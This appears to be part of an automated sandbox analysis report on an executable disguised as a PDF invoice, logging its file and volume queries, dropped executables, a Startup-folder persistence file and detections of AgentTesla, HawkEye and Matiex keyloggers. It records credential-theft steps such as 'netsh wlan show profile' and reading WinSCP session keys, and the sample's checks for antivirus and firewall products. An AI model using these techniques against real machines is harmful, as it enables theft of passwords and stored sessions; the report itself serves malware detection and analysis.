                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exe Queries volume information: C:\Users\user\AppData\Local\Temp\origigoods40.exe VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\netsh.exe Queries volume information: C:\ VolumeInformation
                            Source: C:\Windows\SysWOW64\netsh.exe Queries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.DataSetExtensions\v4.0_4.0.0.0__b77a5c561934e089\System.Data.DataSetExtensions.dll VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exe Queries volume information: C:\Users\user\AppData\Local\Temp\origigoods40.exe VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                            Lowering of HIPS / PFW / Operating System Security Settings:

                            Uses netsh to modify the Windows network and firewall settings
                            Source: unknown Process created: C:\Windows\SysWOW64\netsh.exe 'netsh' wlan show profile
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Blob
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information:

Yara detected AgentTesla
Yara detected HawkEye Keylogger
Yara detected MailPassView
Yara detected Matiex Keylogger
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Tries to harvest and steal WLAN passwords
Source: unknown | Process created: C:\Windows\SysWOW64\netsh.exe 'netsh' wlan show profile
